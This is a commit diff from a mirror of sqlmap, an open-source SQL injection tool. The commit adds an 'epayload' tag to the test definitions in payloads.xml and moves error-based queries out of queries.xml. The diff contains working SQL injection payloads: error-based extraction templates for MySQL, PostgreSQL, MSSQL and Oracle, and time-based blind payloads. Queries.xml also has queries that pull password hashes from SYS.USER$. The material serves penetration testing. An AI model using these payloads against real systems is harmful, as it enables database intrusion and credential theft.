mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-12-26 17:39:03 +00:00
Added tag <epayload> to the payloads.xml's <test> tag to define which payload to use when exploiting the test type.
Removed some useless tests. Moved <error> from queries.xml to payloads.xml as it makes more sense. Beeps at sql inj found only if --beep is provided. Minor fix in order to be able to pickle advancedDict() objects. Minor code refactoring. Removed useless folders.
This commit is contained in:
Bernardo Damele
@@ -126,6 +126,9 @@ Tag: <test>
|
||||
original value to its negative representation
|
||||
3: Replace the parameter original value
|
||||
|
||||
Sub-tag: <epayload>
|
||||
The payload that will be used to exploit the injection point.
|
||||
|
||||
Sub-tag: <request>
|
||||
What to inject for this test.
|
||||
|
||||
@@ -187,6 +190,7 @@ Formats:
|
||||
<risk></risk>
|
||||
<clause></clause>
|
||||
<where></where>
|
||||
<epayload></epayload>
|
||||
<request>
|
||||
<payload></payload>
|
||||
<comment></comment>
|
||||
@@ -403,6 +407,7 @@ Formats:
|
||||
<risk>1</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<epayload></epayload>
|
||||
<request>
|
||||
<payload>AND [RANDNUM]=[RANDNUM]</payload>
|
||||
</request>
|
||||
@@ -418,6 +423,7 @@ Formats:
|
||||
<risk>3</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<epayload></epayload>
|
||||
<request>
|
||||
<payload>OR [RANDNUM]=[RANDNUM]</payload>
|
||||
</request>
|
||||
@@ -436,6 +442,7 @@ Formats:
|
||||
<risk>1</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>1</where>
|
||||
<epayload></epayload>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload>
|
||||
</request>
|
||||
@@ -455,6 +462,7 @@ Formats:
|
||||
<risk>1</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>1</where>
|
||||
<epayload></epayload>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
|
||||
</request>
|
||||
@@ -473,6 +481,7 @@ Formats:
|
||||
<risk>1</risk>
|
||||
<clause>3</clause>
|
||||
<where>1</where>
|
||||
<epayload></epayload>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
|
||||
</request>
|
||||
@@ -491,6 +500,7 @@ Formats:
|
||||
<risk>1</risk>
|
||||
<clause>3</clause>
|
||||
<where>1</where>
|
||||
<epayload></epayload>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END) FROM DUAL)</payload>
|
||||
</request>
|
||||
@@ -511,6 +521,7 @@ Formats:
|
||||
<risk>1</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>1</where>
|
||||
<epayload></epayload>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END))</payload>
|
||||
</request>
|
||||
@@ -526,6 +537,7 @@ Formats:
|
||||
<risk>1</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>3</where>
|
||||
<epayload></epayload>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload>
|
||||
</request>
|
||||
@@ -545,6 +557,7 @@ Formats:
|
||||
<risk>1</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>3</where>
|
||||
<epayload></epayload>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
|
||||
</request>
|
||||
@@ -563,6 +576,7 @@ Formats:
|
||||
<risk>1</risk>
|
||||
<clause>3</clause>
|
||||
<where>3</where>
|
||||
<epayload></epayload>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
|
||||
</request>
|
||||
@@ -581,6 +595,7 @@ Formats:
|
||||
<risk>1</risk>
|
||||
<clause>3</clause>
|
||||
<where>3</where>
|
||||
<epayload></epayload>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END) FROM DUAL)</payload>
|
||||
</request>
|
||||
@@ -601,6 +616,7 @@ Formats:
|
||||
<risk>1</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>3</where>
|
||||
<epayload></epayload>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END))</payload>
|
||||
</request>
|
||||
@@ -619,6 +635,7 @@ Formats:
|
||||
<risk>0</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<epayload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</epayload>
|
||||
<request>
|
||||
<payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload>
|
||||
</request>
|
||||
@@ -638,6 +655,7 @@ Formats:
|
||||
<risk>0</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<epayload>AND [RANDNUM]=CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC)</epayload>
|
||||
<request>
|
||||
<payload>AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)</payload>
|
||||
</request>
|
||||
@@ -656,6 +674,7 @@ Formats:
|
||||
<risk>0</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<epayload>AND [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]'))</epayload>
|
||||
<request>
|
||||
<payload>AND [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
|
||||
</request>
|
||||
@@ -674,6 +693,7 @@ Formats:
|
||||
<risk>0</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<epayload>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</epayload>
|
||||
<request>
|
||||
<payload>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
|
||||
</request>
|
||||
@@ -699,6 +719,7 @@ Formats:
|
||||
<risk>0</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>1</where>
|
||||
<epayload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</epayload>
|
||||
<request>
|
||||
<payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload>
|
||||
</request>
|
||||
@@ -718,6 +739,7 @@ Formats:
|
||||
<risk>0</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>1</where>
|
||||
<epayload>(CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC))</epayload>
|
||||
<request>
|
||||
<payload>(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
|
||||
</request>
|
||||
@@ -736,6 +758,7 @@ Formats:
|
||||
<risk>0</risk>
|
||||
<clause>3</clause>
|
||||
<where>1</where>
|
||||
<epayload>(CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]')))</epayload>
|
||||
<request>
|
||||
<payload>(CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>
|
||||
</request>
|
||||
@@ -754,6 +777,7 @@ Formats:
|
||||
<risk>0</risk>
|
||||
<clause>3</clause>
|
||||
<where>1</where>
|
||||
<epayload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</epayload>
|
||||
<request>
|
||||
<payload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
|
||||
</request>
|
||||
@@ -772,6 +796,7 @@ Formats:
|
||||
<risk>0</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>3</where>
|
||||
<epayload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</epayload>
|
||||
<request>
|
||||
<payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload>
|
||||
</request>
|
||||
@@ -791,6 +816,7 @@ Formats:
|
||||
<risk>0</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>3</where>
|
||||
<epayload>(CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC))</epayload>
|
||||
<request>
|
||||
<payload>(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
|
||||
</request>
|
||||
@@ -809,6 +835,7 @@ Formats:
|
||||
<risk>0</risk>
|
||||
<clause>3</clause>
|
||||
<where>3</where>
|
||||
<epayload>(CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]')))</epayload>
|
||||
<request>
|
||||
<payload>(CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>
|
||||
</request>
|
||||
@@ -827,6 +854,7 @@ Formats:
|
||||
<risk>0</risk>
|
||||
<clause>3</clause>
|
||||
<where>3</where>
|
||||
<epayload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</epayload>
|
||||
<request>
|
||||
<payload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
|
||||
</request>
|
||||
@@ -1078,6 +1106,7 @@ Formats:
|
||||
<risk>1</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<epayload>AND IF((%s), [RANDNUM], SLEEP([SLEEPTIME]))</epayload>
|
||||
<request>
|
||||
<payload>AND SLEEP([SLEEPTIME])</payload>
|
||||
</request>
|
||||
@@ -1097,6 +1126,7 @@ Formats:
|
||||
<risk>1</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<epayload>AND IF((%s), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))</epayload>
|
||||
<request>
|
||||
<payload>AND BENCHMARK(5000000, MD5('[SLEEPTIME]'))</payload>
|
||||
</request>
|
||||
@@ -1108,25 +1138,6 @@ Formats:
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>PostgreSQL > 8.1 AND time-based blind</title>
|
||||
<stype>5</stype>
|
||||
<level>1</level>
|
||||
<risk>1</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<request>
|
||||
<payload>AND PG_SLEEP([SLEEPTIME])</payload>
|
||||
</request>
|
||||
<response>
|
||||
<time>[SLEEPTIME]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>PostgreSQL</dbms>
|
||||
<dbms_version>> 8.1</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>SQLite > 2.0 AND time-based blind</title>
|
||||
<stype>5</stype>
|
||||
@@ -1134,6 +1145,7 @@ Formats:
|
||||
<risk>1</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<epayload></epayload>
|
||||
<request>
|
||||
<payload>AND LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000))))</payload>
|
||||
</request>
|
||||
@@ -1154,6 +1166,7 @@ Formats:
|
||||
<risk>1</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<epayload></epayload>
|
||||
<request>
|
||||
<payload>AND (COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) > 0</payload>
|
||||
</request>
|
||||
@@ -1167,7 +1180,7 @@ Formats:
|
||||
</test>
|
||||
<!--
|
||||
NOTE: there is no way to perform this test against Microsoft SQL
|
||||
Server, Sybase, Oracle or PostgreSQL < 8.2
|
||||
Server, Sybase, Oracle or PostgreSQL
|
||||
-->
|
||||
<!-- TODO: if possible, add payload for Microsoft Access and SAP MaxDB -->
|
||||
<!-- End of AND time-based blind tests -->
|
||||
@@ -1181,6 +1194,7 @@ Formats:
|
||||
<risk>3</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<epayload>OR IF((%s), [RANDNUM], SLEEP([SLEEPTIME]))</epayload>
|
||||
<request>
|
||||
<payload>OR SLEEP([SLEEPTIME])</payload>
|
||||
</request>
|
||||
@@ -1200,6 +1214,7 @@ Formats:
|
||||
<risk>3</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<epayload>OR IF((%s), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))</epayload>
|
||||
<request>
|
||||
<payload>OR BENCHMARK(5000000, MD5('[SLEEPTIME]'))</payload>
|
||||
</request>
|
||||
@@ -1211,25 +1226,6 @@ Formats:
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>PostgreSQL > 8.1 OR time-based blind</title>
|
||||
<stype>5</stype>
|
||||
<level>2</level>
|
||||
<risk>3</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<request>
|
||||
<payload>OR PG_SLEEP([SLEEPTIME])</payload>
|
||||
</request>
|
||||
<response>
|
||||
<time>[SLEEPTIME]</time>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>PostgreSQL</dbms>
|
||||
<dbms_version>> 8.1</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>SQLite > 2.0 OR time-based blind</title>
|
||||
<stype>5</stype>
|
||||
@@ -1237,6 +1233,7 @@ Formats:
|
||||
<risk>3</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<epayload></epayload>
|
||||
<request>
|
||||
<payload>OR LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000))))</payload>
|
||||
</request>
|
||||
@@ -1257,6 +1254,7 @@ Formats:
|
||||
<risk>3</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<epayload></epayload>
|
||||
<request>
|
||||
<payload>OR (COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) > 0</payload>
|
||||
</request>
|
||||
@@ -1270,7 +1268,7 @@ Formats:
|
||||
</test>
|
||||
<!--
|
||||
NOTE: there is no way to perform this test against Microsoft SQL
|
||||
Server, Sybase, Oracle or PostgreSQL < 8.2
|
||||
Server, Sybase, Oracle or PostgreSQL
|
||||
-->
|
||||
<!-- TODO: if possible, add payload for Microsoft Access and SAP MaxDB -->
|
||||
<!-- End of OR time-based blind tests -->
|
||||
|
||||
159
xml/queries.xml
159
xml/queries.xml
@@ -24,7 +24,6 @@
|
||||
<timedelay query="SELECT SLEEP(%d)" query2="SELECT BENCHMARK(5000000, MD5('%d'))"/>
|
||||
<substring query="MID((%s), %d, %d)"/>
|
||||
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
|
||||
<error query="%s (SELECT %s FROM(SELECT COUNT(*),CONCAT(%s,(%s),%s,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)"/>
|
||||
<inference query="AND ORD(MID((%s), %d, 1)) > %d"/>
|
||||
<banner query="VERSION()"/>
|
||||
<current_user query="CURRENT_USER()"/>
|
||||
@@ -74,84 +73,6 @@
|
||||
</search_column>
|
||||
</dbms>
|
||||
|
||||
<!-- Oracle -->
|
||||
<dbms value="Oracle">
|
||||
<cast query="CAST(%s AS VARCHAR(4000))"/>
|
||||
<length query="LENGTH(%s)"/>
|
||||
<isnull query="NVL(%s, ' ')"/>
|
||||
<delimiter query="||"/>
|
||||
<limit query="ROWNUM AS LIMIT %s) WHERE LIMIT"/>
|
||||
<limitregexp query="ROWNUM\s+AS\s+.+?\s+FROM\s+.+?\)\s+WHERE\s+.+?\s*=\s*[\d]+|ROWNUM\s*=\s*[\d]+"/>
|
||||
<limitgroupstart/>
|
||||
<limitgroupstop/>
|
||||
<limitstring/>
|
||||
<order query="ORDER BY %s ASC"/>
|
||||
<count query="COUNT(%s)"/>
|
||||
<comment query="--"/>
|
||||
<timedelay query="BEGIN DBMS_LOCK.SLEEP(%d); END" query2="EXEC DBMS_LOCK.SLEEP(%d.00)" query3="EXEC USER_LOCK.SLEEP(%d.00)"/>
|
||||
<substring query="SUBSTR((%s), %d, %d)"/>
|
||||
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END) FROM DUAL"/>
|
||||
<error query="%s %s=(SELECT UPPER(XMLType(CHR(60)||%s||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||%s||CHR(62))) FROM DUAL)"/>
|
||||
<inference query="AND ASCII(SUBSTR((%s), %d, 1)) > %d"/>
|
||||
<banner query="SELECT banner FROM v$version WHERE ROWNUM=1"/>
|
||||
<current_user query="SELECT USER FROM DUAL"/>
|
||||
<current_db query="SELECT SYS.DATABASE_NAME FROM DUAL"/>
|
||||
<!--
|
||||
NOTE: in Oracle to check if the session user is DBA you can use:
|
||||
SELECT USERENV('ISDBA') FROM DUAL
|
||||
-->
|
||||
<is_dba query="(SELECT GRANTED_ROLE FROM DBA_ROLE_PRIVS WHERE GRANTEE=USER AND GRANTED_ROLE='DBA')='DBA'"/>
|
||||
<users>
|
||||
<inband query="SELECT USERNAME FROM SYS.ALL_USERS ORDER BY 1"/>
|
||||
<blind query="SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS"/>
|
||||
</users>
|
||||
<passwords>
|
||||
<inband query="SELECT NAME, PASSWORD FROM SYS.USER$" condition="NAME"/>
|
||||
<blind query="SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$ WHERE NAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$ WHERE NAME='%s'"/>
|
||||
</passwords>
|
||||
<!--
|
||||
NOTE: in Oracle to enumerate the privileges for the session user you can use:
|
||||
SELECT * FROM SESSION_PRIVS
|
||||
-->
|
||||
<privileges>
|
||||
<inband query="SELECT GRANTEE, PRIVILEGE FROM DBA_SYS_PRIVS" query2="SELECT USERNAME, PRIVILEGE FROM USER_SYS_PRIVS" condition="GRANTEE" condition2="USERNAME"/>
|
||||
<blind query="SELECT DISTINCT(PRIVILEGE) FROM (SELECT DISTINCT(PRIVILEGE), ROWNUM AS LIMIT FROM DBA_SYS_PRIVS WHERE GRANTEE='%s') WHERE LIMIT=%d" query2="SELECT DISTINCT(PRIVILEGE) FROM (SELECT DISTINCT(PRIVILEGE), ROWNUM AS LIMIT FROM USER_SYS_PRIVS WHERE USERNAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(PRIVILEGE)) FROM DBA_SYS_PRIVS WHERE GRANTEE='%s'" count2="SELECT COUNT(DISTINCT(PRIVILEGE)) FROM USER_SYS_PRIVS WHERE USERNAME='%s'"/>
|
||||
</privileges>
|
||||
<!--
|
||||
NOTE: in Oracle to enumerate the roles for the session user you can use:
|
||||
SELECT * FROM SESSION_ROLES
|
||||
-->
|
||||
<roles>
|
||||
<inband query="SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS" query2="SELECT USERNAME, GRANTED_ROLE FROM USER_ROLE_PRIVS" condition="GRANTEE" condition2="USERNAME"/>
|
||||
<blind query="SELECT DISTINCT(GRANTED_ROLE) FROM (SELECT DISTINCT(GRANTED_ROLE), ROWNUM AS LIMIT FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s') WHERE LIMIT=%d" query2="SELECT DISTINCT(GRANTED_ROLE) FROM (SELECT DISTINCT(GRANTED_ROLE), ROWNUM AS LIMIT FROM USER_ROLE_PRIVS WHERE USERNAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s'" count2="SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM USER_ROLE_PRIVS WHERE USERNAME='%s'"/>
|
||||
</roles>
|
||||
<!-- NOTE: in Oracle there is no query to enumerate DBMS databases. It is possible only through a STATUS request to the Oracle TNS Listener negotiating its protocol -->
|
||||
<dbs/>
|
||||
<tables>
|
||||
<!-- NOTE: in Oracle the TABLESPACE_NAME is the spacename corresponding to SYS, SYSDBA, USERS. It is NOT the database name -->
|
||||
<inband query="SELECT TABLESPACE_NAME, TABLE_NAME FROM SYS.ALL_TABLES" condition="TABLESPACE_NAME"/>
|
||||
<blind query="SELECT TABLE_NAME FROM (SELECT TABLE_NAME, ROWNUM AS LIMIT FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'"/>
|
||||
</tables>
|
||||
<columns>
|
||||
<inband query="SELECT COLUMN_NAME, DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" condition="COLUMN_NAME"/>
|
||||
<blind query="SELECT COLUMN_NAME FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" query2="SELECT DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND COLUMN_NAME='%s'" count="SELECT COUNT(COLUMN_NAME) FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" condition="COLUMN_NAME"/>
|
||||
</columns>
|
||||
<dump_table>
|
||||
<inband query="SELECT %s FROM %s"/>
|
||||
<blind query="SELECT %s FROM (SELECT %s, ROWNUM AS LIMIT FROM %s) WHERE LIMIT=%d" count="SELECT COUNT(*) FROM %s"/>
|
||||
</dump_table>
|
||||
<search_db/>
|
||||
<search_table>
|
||||
<!-- NOTE: in Oracle the TABLESPACE_NAME is the spacename corresponding to SYS, SYSDBA, USERS. It is NOT the database name -->
|
||||
<inband query="SELECT TABLESPACE_NAME, TABLE_NAME FROM SYS.ALL_TABLES WHERE " condition="TABLE_NAME" condition2="TABLESPACE_NAME"/>
|
||||
<blind query="SELECT DISTINCT(TABLESPACE_NAME) FROM SYS.ALL_TABLES WHERE " query2="SELECT TABLE_NAME FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'" count="SELECT COUNT(DISTINCT(TABLESPACE_NAME)) FROM SYS.ALL_TABLES WHERE " count2="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'" condition="TABLE_NAME" condition2="TABLESPACE_NAME"/>
|
||||
</search_table>
|
||||
<search_column>
|
||||
<inband query="SELECT TABLE_NAME FROM SYS.ALL_TAB_COLUMNS WHERE " condition="COLUMN_NAME"/>
|
||||
<blind query="" query2="SELECT DISTINCT(TABLE_NAME) FROM SYS.ALL_TAB_COLUMNS" count="" count2="SELECT COUNT(DISTINCT(TABLE_NAME)) FROM SYS.ALL_TAB_COLUMNS" condition="COLUMN_NAME"/>
|
||||
</search_column>
|
||||
</dbms>
|
||||
|
||||
<!-- PostgreSQL -->
|
||||
<dbms value="PostgreSQL">
|
||||
<cast query="CAST(%s AS CHARACTER(10000))"/>
|
||||
@@ -175,7 +96,6 @@
|
||||
<timedelay query="SELECT PG_SLEEP(%d)" query2="SELECT 'sqlmap' WHERE exists(SELECT * FROM generate_series(1, 300000%d))" query3="CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep(%d)"/>
|
||||
<substring query="SUBSTR((%s)::text, %d, %d)"/>
|
||||
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
|
||||
<error query="%s %s=CAST(%s||(%s)::text||%s AS NUMERIC)"/>
|
||||
<inference query="AND ASCII(SUBSTR((%s)::text, %d, 1)) > %d"/>
|
||||
<banner query="SELECT VERSION()"/>
|
||||
<current_user query="SELECT CURRENT_USER"/>
|
||||
@@ -242,7 +162,6 @@
|
||||
<timedelay query="WAITFOR DELAY '0:0:%d'"/>
|
||||
<substring query="SUBSTRING((%s), %d, %d)"/>
|
||||
<case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
|
||||
<error query="%s %s=CONVERT(INT,(%s+(%s)+%s))"/>
|
||||
<inference query="AND ASCII(SUBSTRING((%s), %d, 1)) > %d"/>
|
||||
<banner query="SELECT @@VERSION"/>
|
||||
<current_user query="SELECT SYSTEM_USER"/>
|
||||
@@ -290,6 +209,83 @@
|
||||
</search_column>
|
||||
</dbms>
|
||||
|
||||
<!-- Oracle -->
|
||||
<dbms value="Oracle">
|
||||
<cast query="CAST(%s AS VARCHAR(4000))"/>
|
||||
<length query="LENGTH(%s)"/>
|
||||
<isnull query="NVL(%s, ' ')"/>
|
||||
<delimiter query="||"/>
|
||||
<limit query="ROWNUM AS LIMIT %s) WHERE LIMIT"/>
|
||||
<limitregexp query="ROWNUM\s+AS\s+.+?\s+FROM\s+.+?\)\s+WHERE\s+.+?\s*=\s*[\d]+|ROWNUM\s*=\s*[\d]+"/>
|
||||
<limitgroupstart/>
|
||||
<limitgroupstop/>
|
||||
<limitstring/>
|
||||
<order query="ORDER BY %s ASC"/>
|
||||
<count query="COUNT(%s)"/>
|
||||
<comment query="--"/>
|
||||
<timedelay query="BEGIN DBMS_LOCK.SLEEP(%d); END" query2="EXEC DBMS_LOCK.SLEEP(%d.00)" query3="EXEC USER_LOCK.SLEEP(%d.00)"/>
|
||||
<substring query="SUBSTR((%s), %d, %d)"/>
|
||||
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END) FROM DUAL"/>
|
||||
<inference query="AND ASCII(SUBSTR((%s), %d, 1)) > %d"/>
|
||||
<banner query="SELECT banner FROM v$version WHERE ROWNUM=1"/>
|
||||
<current_user query="SELECT USER FROM DUAL"/>
|
||||
<current_db query="SELECT SYS.DATABASE_NAME FROM DUAL"/>
|
||||
<!--
|
||||
NOTE: in Oracle to check if the session user is DBA you can use:
|
||||
SELECT USERENV('ISDBA') FROM DUAL
|
||||
-->
|
||||
<is_dba query="(SELECT GRANTED_ROLE FROM DBA_ROLE_PRIVS WHERE GRANTEE=USER AND GRANTED_ROLE='DBA')='DBA'"/>
|
||||
<users>
|
||||
<inband query="SELECT USERNAME FROM SYS.ALL_USERS ORDER BY 1"/>
|
